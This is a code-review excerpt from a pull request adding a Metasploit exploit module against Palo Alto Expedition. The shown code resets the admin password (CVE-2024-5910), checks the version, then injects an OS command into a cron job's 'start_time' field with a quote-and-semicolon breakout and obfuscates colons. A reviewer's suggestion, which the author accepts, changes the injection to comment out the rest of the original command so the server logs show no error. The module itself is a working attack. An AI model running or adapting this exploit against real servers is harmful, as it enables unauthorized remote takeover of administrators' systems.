modules/exploits/linux/http/paloalto_expedition_rce.rb

```diff
@@ -0,0 +1,279 @@
+      end
+
+      if res.code == 403
+        return CheckCode::Safe
+      end
+
+      fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.to_s.include?('Admin password restored to')
+
+      respass = res.to_s.match(/'([^']+)'/)[1]
+      print_good("Admin password successfully restored to default value #{respass} (CVE-2024-5910).")
+      datastore['PASSWORD'] = respass
+      datastore['USERNAME'] = 'admin'
+    end
+
+    @xsrf_token_value = xsrf_token_value
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'bin/MTSettings/settings.php?param=versions'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      }
+    )
+
+    data = res.get_json_document
+    version = data['msg']['Expedition']
+
+    if version.nil?
+      return CheckCode::Unknown
+    else
+      print_status('Version retrieved: ' + version)
+    end
+
+    if Rex::Version.new(version) <= Rex::Version.new('1.2.95')
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(cmd)
+    @xsrf_token_value ||= xsrf_token_value
+
+    print_status('Adding a new cronjob...')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'add',
+        'type' => 'new_cronjob',
+        'project' => 'pandb'
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
+    end
+
+    data = res.get_json_document
+    fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['success'] == true
+
+    cmd = cmd.gsub('http://', '').gsub(':', '$(echo $PATH|cut -c16)')
+    cmds = cmd.split(';')
+    cmds.each do |c|
+      if c.length > 97
+        print_bad("Command: '#{c}' is too long. Length: #{c.length}. Try to shorten it to 97 or less characters.")
+      end
+    end
+
+    name = Rex::Text.rand_text_alpha(4..8)
+    vprint_status('Using random name: ' + name)
+    print_status('Injecting OS command...')
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'bin/CronJobs.php'),
+      'keep_cookies' => true,
+      'headers' => {
+        'Csrftoken' => @xsrf_token_value
+      },
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        'action' => 'set',
+        'type' => 'cron_jobs',
+        'project' => 'pandb',
+        'name' => name,
+        'cron_id' => 1,
+        'recurrence' => 'Daily',
+        'start_time' => "\"; #{cmds[0]} ;"
```

Comment:
```suggestion
        'start_time' => "\";#{cmds[0]} #"
```

Spare one space, and will prevent the rest of the original command from executing and generate an error in the logs.

Reply:
Thank you, updated.